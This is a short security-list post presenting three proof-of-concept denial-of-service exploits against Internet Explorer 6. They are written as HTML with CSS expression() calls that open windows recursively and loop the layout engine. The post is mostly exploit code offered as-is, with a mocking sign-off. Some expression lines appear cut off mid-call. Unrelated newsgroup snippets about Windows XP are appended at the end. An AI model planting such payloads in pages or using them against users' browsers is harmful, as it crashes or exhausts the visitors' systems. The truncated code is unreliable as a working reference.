Internet Explorer 6. CSS Expression Denial of Service (P.o.C.)



This is just another couple of exploits for this well-known browser. The third one is a lame combination of both.

Tested under Windows XP SP2, MSIE 6.0.2900.2180

--- Exploit 1 ---
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width: expression(document.getElementById
<tr><td></td></tr>
</table>
</div>
--- end ---

--- Exploit 2 ---
<div style="width: expression(window.open(self.location));">
&nbsp;
</div>
--- end ---

--- Exploit 3 (combined) ---
<html>
<head>
<title>Another non-standards compliant IE D.o.S. </title>
</head>
<body>
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width: expression(parseInt(window.open(self.location))+document.getElementById
<tr>
<td>
IE makes my life harder :-(. It sucks, don't use it :-).
</td>
</tr>
</table>
</div>
Proof of Concept written by <a href="http://xiam.be";>xiam</a>.<br />
Tested under Windows XP SP2, MSIE 6.0.2900.2180
</body>
</html>
---

--
La civilizaci~n no suprime la barbarie, la perfecciona. - Voltaire
- J. Carlos Nieto (xiam). http://xiam.be



Relevant Pages

  • WinXP SP2: IE has encountered a problem and needs to close..
    ... Problem recently started up with an HP laptop, Windows XP ... Pro (recently updated with SP2). ... MSIE no longer wants to start. ... Windows Components area (I know, ...
    (microsoft.public.windows.inetexplorer.ie6.setup)
  • Re: Windows Startup Taking a Long Time
    ... It may help speed up your system, but it should be clean ... using Windows XP "prettifications". ... As for Service Pack 2 (SP2) for Windows XP, ... You should at least turn on the built in firewall. ...
    (microsoft.public.windowsxp.help_and_support)
  • Re: Slow startup and shutdown
    ... > applications that have always been present, ... The problem began before loading SP2 and hasn't changed. ... using Windows XP "prettifications". ... You should at least turn on the built in firewall. ...
    (microsoft.public.windowsxp.perform_maintain)
  • Re: question about clean install after SP2
    ... > After SP2 install my IE was seriously defective. ... You should periodically defragment your hard drives as well as check them ... using Windows XP "prettifications". ... You should at least turn on the built in firewall. ...
    (microsoft.public.windowsxp.help_and_support)
  • Re: Browser Adverts????????
    ... With everything in this list and SP2.. ... It contains advice ... using Windows XP "prettifications". ... You should at least turn on the built in firewall. ...
    (microsoft.public.windowsxp.help_and_support)